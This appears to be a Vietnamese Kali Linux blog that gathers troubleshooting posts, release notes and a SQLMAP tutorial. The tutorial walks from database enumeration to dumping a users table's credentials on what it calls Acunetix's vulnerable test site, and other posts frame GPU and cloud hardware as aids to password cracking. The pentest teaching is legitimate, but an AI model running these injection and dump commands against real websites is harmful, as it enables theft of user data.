Fix Installation step failed - Xử lý lỗi khi cài đặt Kali Linux

Vấn đề:

Khi cài đặt Kali Linux chắc hẳn một số bạn sẽ bị tình trạng Installation step failed (bước cài đặt thất bại) ở chỗ Install the system (cài đặt hệ thống) mà không kèm theo bất kỳ thông tin nào khác để khắc phục. Vấn đề có thể là do file ISO của bạn tải về bị lỗi, quá trình tạo USB Boot bị lỗi, hay là do không đủ ổ cứng cài đặt,... v.v. Thì hôm nay mình sẽ hướng dẫn các bạn kiểm tra lỗi gặp phải là gì để khắc phục.
Installation step failed.

Khắc phục sự cố không FullScreen khi cài trên VMware


I/ Mô tả sự cố.

Khi cài Kali trên máy ảo VMware đa phần ta hay bị trường hợp không FullScreen được, nó được căn vào giữa, làm rất nhiều người rất khó chịu mặc dù đã chỉnh chế độ FullScreen (Ctrl + Alt + Enter)

Vì thế hôm nay, trong bài viết này TheKaliTools sẽ hướng dẫn cách khắc phục sự cố sau cho người mới tập làm quen với Kali Linux.



II/ Khắc phục sự cố.

Để khắc phục sự cố sau trước hết ta thiết lập lại  Repositories bằng cách thay đổi file sources.list.

Mở Terminal lên chạy lệnh như sau.
gedit /etc/apt/sources.list

Copy các giá trị sau vào và paste vào file source.list xong save lại.

#The Kali Rolling Repository
deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free



Sau khi save lại xong ta mở terminal chạy command
apt-get update


Đợi upgrade xong, sau đó ta cài đặt VMwareTools cho Kali Linux, bằng cách chạy command.
apt -y install open-vm-tools-desktop fuse
 Khi đã xong hết ta khởi động lại bằng command.
reboot
Tới đây là hoàn thành và cùng tận hưởng thành quả.



Cảm ơn bạn đã theo dõi bài viết của chúng tôi, hẹn gặp lại ở bài viết sau, thân ái chào tạm biệt.

Sửa lỗi "/dev/sda1 contains a file system with errors, check forced"

Nguyên nhân gây lỗi:

Vào một ngày đẹp trời, đang ngồi làm báo cáo thì đột nhiên máy báo hêt pin, đi lấy sạc cắm vào thì đứng máy. Không thể điều khiển để restart được, nên đành ấn nút ngắt nguồn. Khởi động lại thì bỗng dưng ... một màn hình đen toàn chữ:
Thông báo lỗi.
Thông báo lỗi: /dev/sda1 contains a file system with errors, check forced
Nó yêu cầu ta nhập yes để để quét cái gì đó rồi hiện ra dòng nhập lệnh (initramfs):
/dev/sda1: UNESPECTED INCONSISTENCY: RUN fsck MANUALLY.
(i.e., without -a or -p options)
fsck exited with status code 4
The root filesystem on /dev/sda1 requies a manual fsck

BusyBox v1.22.1 (Debian 1:1.22.0-19+b1) built-in shell (ash)
Enter 'help' for a list of built-in commands.

(initramfs)
Nguyên nhân là do file hệ thống bị lỗi, tuy nhiên quá trình check lỗi tự động lại không được, hệ thống yêu cầu check lỗi bằng tay.

Sửa như thế nào đây?

Đi lên mạng search theo các từ khóa lỗi có được, mình tìm cách sửa thì mình tìm ra được cách sử dụng fsck (file system check) để kiểm tra và sửa lỗi các file hệ thống. Ta nhập lệnh sau:
(initramfs) e2fsck -f /dev/sda1
Như mình nói ở trên, lệnh e2fsck dùng để check các file hệ thống, tùy chọn -f (force) để bắt buộc tiến trình kiểm tra toàn bộ. Các bạn nhớ thay sda1 thành phân vùng hệ thống của bạn nhé.
Tiếp theo đó là một đống các câu hỏi, các bạn cứ yes hết.

Sau khi hoàn tất quá trình quét hãy restart lại bằng lệnh reboot hoặc restart cứng cũng được.

Lời kết:

Qua bài viết lần này mình muốn nhắn nhũ với các bạn rằng: Nếu bạn gặp phải lỗi trong quá trình sử dụng, thì hãy tìm hiểu xem đó là lỗi gì? Từ đó tìm kiếm theo các từ khóa thông báo lỗi (error), hay mã lỗi (error code) thì sẽ nhanh chống tìm được hướng giải quyết thôi. 
Và nếu bạn muốn người khác giúp, thì cũng như vậy, cho họ biết thông báo lỗi, mã lỗi là gì? Chứ đừng nói chung kiểu như bị liệt, bị đứng máy, không đăng nhập được, không mở được,... những trường hợp này bạn hãy kiếm log để xem là lỗi gì nhé, vì tụi mình cũng bất lực. Chúc các bạn thành công!

Sử dụng SQLMAP để khai thác lỗ hỏng SQL Injection

1. SQL Injection là gì?


Lỗ hổng SQL Injection là một lổ hỏng khá cơ bản và cũng khá nguy hiểm với các webmaster. Do sự thiếu cẩn trọng trong lúc lập trình hoặc không thể kiểm soát và fillter được hết các form để từ đó các script kiddies tận dụng inject vào thực thi query/command mà không cần login username/password để remote excute, dump data, lấy root sqlsever,..

2. Các mục tiêu, điểm yếu của website.


Ta có thể tìm các trang web cho submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng chẳng hạn như form login, search, feedback,..


3. Target và nội dung của bài viết này.


Đương nhiên đối với lỗi SQL Injection có rất nhiều kiểu khai thác, có thể tự query/command mà không cần sự hỗ trợ từ phần mềm thứ ba, cũng như sử dụng sqlroot, havij, sqlnija,.. Ở đây chúng ta sẽ sử dụng SQLMAP để thực hiện khai thác lỗ hỏng này.

a) SQLMAP là gì?


SQLMAP là công cụ khai thác những lổ hỏng của cơ sở dữ liệu SQL. Công cụ này được xem là công cụ khai thác SQL tốt nhất hiện nay. Được giới bảo mật và giới hacker sử dụng thường xuyên. Với người dùng Kali hoặc Back Track 5 thì SQLMAP đã được tích hợp sẵn vào hệ điều hành. Riêng Windows thì chúng ta phải cài đặt thêm python và SQLMAP để sử dụng.



b) Cách sử dụng, thực thi sqlmap.


Ở đây ta có một bài test của acunetix, đây là bài test phần mềm của họ nên không ảnh hưởng gì!
TARGET : 176.28.50.165/listproducts.php?cat=1
Để có thể khai thác được database của web này ta chạy cú pháp sau: sqlmap --url ' ' --dbs
sqlmap --url '176.28.50.165/listproducts.php?cat=1' --dbs
Ở đây ta có kết quả như sau:



Ta tiếp tục khai thác tables trong database acuart bằng cú pháp: sqlmap --url ' ' -D acuart --tables
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart --tables


Sau khi có tables ta tiếp tục kiểm tra columns ở đây ta chọn tables users: sqlmap --url ' ' -D acuart -T users --columns
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart -T users --columns
Cuối cùng ta dump data của columns users: sqlmap --url ' ' -D ' ' -T ' ' -C ' ' --dump
sqlmap --url '176.28.50.165/listproducts.php?cat=1' -D acuart -T users -C email,name,uname,pass--dump
 


KẾT:


Mình xin dừng bài viết tại đây, cảm ơn đã theo dõi,.. nếu có nhã ý hoặc thích bài viết này vui lòng share cho bạn bè cùng coi chung để ủng hộ tinh thần của member TKT. <33333333333333

[Thông báo] Thay đổi series Hacking cơ bản với Kali Linux

Nguồn gốc của sự sai lầm:

Thời gian trước mình đã gửi đến các bạn 10 bài viết đầu tiên của series Hacking cơ bản với Kali Linux, tuy nhiên trong quá trình viết bài vào mấy ngày trước, mình đã nhận ra một sai lầm nghiêm trọng trong cách đặt tiêu đề cho series này. Cụ thể là series này đã và đang được biên soạn lại dựa trên cuốn Basic Security Testing With Kali Linux của tác giả Deniel W. Dieterle, nội dung chủ yếu xoay quanh việc sử dụng Kali Linux để pentest chứ không nói nhiều về nguyên lý hacking.
Thật là quá thất trách =))). 
Nói thẳng ra là chúng ta đang học làm "script kiddie" nếu cứ đọc theo và "thực hành" một cách vô tội vạ như thế này!

Sửa chữa lỗi lầm!!

Vậy thì kể từ bài viết này, mình sẽ sử dụng tên mới là series Sử dụng Kali Linux để pentest, và đồng thời cũng thay đổi tiêu đề của các bài đăng trước đó lại cho đúng, đường link vẫn giữ nguyên nhé, nếu thấy link die các bạn hãy báo cho mình biết! Và thời gian tới mình sẽ viết thêm một series nữa mang đậm chất lý thuyết cho các bạn nào muốn căng não!
Vậy tóm lại series Hacking cơ bản với Kali Linux sẽ đổi thành series Sử dụng Kali Linux để pentest.

Lời kết:

Mình rất xin lỗi vì sự nhầm lẫn tai hại này, mong rằng nó sẽ không gây ra hậu quả quá nghiêm trọng. Mình nghĩ chắc là không đâu *cười*. Cảm ơn các bạn đã luôn ủng hộ Thekalitools.com.
Chúc các bạn nghĩ lễ vui vẻ!

Chi tiết về bản cập nhật Kali Linux 2017.1

Kali Linux 2017.1:

Ở năm ngoái ta đã có hai phiên bản là 2016.12016.2.
Kali 2017.1 Release.
Và cũng như vậy, vào ngày 25 tháng 4 vừa qua, Offensive Security đã tung ra phiên bản Kali Linux 2017.1. Đây là phiên bản mới nhất ở thời điểm hiện tại, chúng ta cùng điểm qua những thay đổi trong phiên bản này nhé!

Chi tiết bản cập nhật 2017.1:

Driver cho chipset RTL8812AU:

Trong thời gian vừa qua, Offensive Security nhận được rất nhiều yêu cầu hỗ trợ driver cho card wifi sử dụng chipset RTL8812AU. Các driver mới này mặc định không có trong kernel, nhưng giờ đây bạn đã có thể cài thêm vào. 
AWUS036ACH cũng sử dụng chip RTL8812AU.
Driver này bạn có thể cài đặt bằng lệnh:
# apt-get update
# apt install realtek-rtl88xxau-dkms

Chuẩn hóa cho card đồ họa NVIDIA có cấu trúc CUDA:

Cài đặt các driver luôn là vấn đề "nhứt nhói" ở các phiên bản Kali. Tuy nhiên, những cải tiến sau đây sẽ giúp cho quá trình cracking với card đồ họa được dễ dàng hơn. Driver cho các card đồ họa NVIDIA có cấu trúc CUDA đã sẵn sàng!!! Cùng với phần cứng được hỗ trợ, các công cụ như hashcat và Pyrit có thể tận dụng card đồ họa NVIDIA trong quá trình tấn công. 
NVIDIA CUDA.
Để biết thêm về tính năng này, bạn hãy đọc bài đăng trên blog hoặc tài liệu cập nhật chính thức.
Và thực hiện, các bạn hãy đọc bài cách cài đặt driver cho card màn hình NVIDIA trên Kali Linux.

Hỗ trợ card đồ họa Amazone AWS và Microsoft Azura Availability:

Cloud Server.
Hiện nay việc sử dụng các hệ thống cloud server để tấn công cracking mật khẩu, Offensive đã nhận thấy điều này và hỗ đã bắt tay vào làm việc với vấn đề này. Và nhận thấy Amazon’s AWS P2-Series và Microsoft’s Azure NC-Series cho phép điều khiển GPU, họ đã làm các các bản images cho AWS và Azure.
Các bạn có thể đọc thêm tại trang này: Cracking in the Cloud with CUDA GPUs

OpenVAS 9 đã có trong Kali Repositories:

Chỉ có trong repositories chứ không được cài đặt sẵn trong bản cập nhật!
Các bạn có thể cài đặt OpenVAS bằng các lệnh sau:
# apt-get update
# apt install openvas

Tổng kết: 

Như vậy là ta đã điểm qua nổi bật trong phiên bản đầu tiên của năm nay, các bạn sử dụng card đồ họa NVIDIA hãy cập nhật lên ngay nhé, vì nó sẽ giúp ích khá nhiều cho năng suất làm việc của bạn đấy!


Mời tải về Kali Linux 2017.1 - Kali Linux 2017.1 Release

Mới đây vào ngày 25/04/2017, phiên bản Kali Linux 2017.1 đã được phát hành với việc sửa một số lỗi về Wireless và hỗ trợ thêm một số dòng GPU. Các bạn có thể đọc thêm bài viết chi tiết về bản cập nhật này.
Nâng cấp ngay Kali 2017 nào!!!

Yêu cầu phần cứng:

- Tối thiểu 20GB để cài đặt Kali Linux
- Tối thiểu 1GB RAM
- Hỗ trợ DVD hoặt USB Boot.

Download và cài đặt:

Link Download: Download Kali Linux Images.
Sau khi download về ta thực hiện cài đặt bình thường.
Và tin vui là trong phiên bản lần này, Offensive Security cũng cập nhật luôn phiên bản dành cho VM, nếu bạn muốn sử dụng máy ảo VM, thì hãy tải link dưới đây nhé!
Link Download for VM: Kali Linux Custom Images.

Cập nhật và nâng cấp:

Nếu bạn đang sử dụng Kali Linux phiên bản 2016.2 hay trở về trước, và để nâng cấp lên phiên bản mới nhất này thì hãy cập nhật repositories trước đã nhé, rồi sử dụng 3 lệnh sau:
# apt update
# apt dist-upgrade
# reboot

Lời kết:

Trong phiên bản lần này đáng chú ý nhất là hỗ trợ driver cho TL8812AU Wireless Card và cải thiện hiệu suất cho các các GPU CUDA, như vậy sẽ khắc phục được thêm phần nào cho vấn đề xung đột khi thiếu driver mà nhiều bạn đã gặp phải.


Cài đặt driver cho card đồ họa Nvidia CUDA trên Kali Linux

Tìm hiểu về driver:

Card đồ họa (hay card màn hình, VGA, GPU) là một phần cứng mở rộng có chức năng giúp CPU xử lý hình ảnh, làm giảm khối lượng công việc mà CPU phải gánh vát.
Driver cũng giống như một kernel, bản thân nó là một thành phần giúp cho phần mềm giao tiếp được với phần cứng, tuy nhiên driver lại đóng gói nhỏ gọn và cài đặt đơn giản chứ không mất công biên dịch như kernel.
Nvidia VGA Driver.

Sử dụng Kali Linux để pentest phần 10: Tìm hiểu về Social-Engineer Toolkit

Về Social Engineer:

Social Engineering - nghệ thuật giao tiếp đỉnh cao.
Chắc chắn bạn đã từng nghe đến phương pháp Social Enginnering trong giới hacker, hay còn gọi là Human Hacking. Đây thật sự là một phương pháp đỉnh cao của hacking, sử dụng nghệ thuật giao tiếp để khai thác thông tin từ người dùng.

Kết nối trực tiếp Google Drive với Kali Linux

Tâm sự:

Hôm nay là một ngày nóng kinh khủng, lại còn cúp điện nên chả làm ăn gì được. Thôi thì mình hướng dẫn một mẹo nhỏ trên Kali Linux, đó là kết nối tài khoản Google Drive của bạn với Kali Linux thành một phân vùng ảo được mount vào.
Google Drive và Kali Linux.
Nôm na là ta sẽ có một thư mục được kết nối và đồng bộ với tài khoản Google Drive của bạn. Sở dĩ mình nói là mẹo nhỏ là vì nó chẳng cần ứng dụng nào hỗ trợ cả, nó có sẵn trên Kali Linux nhưng chỉ là ít ai để ý tới thôi.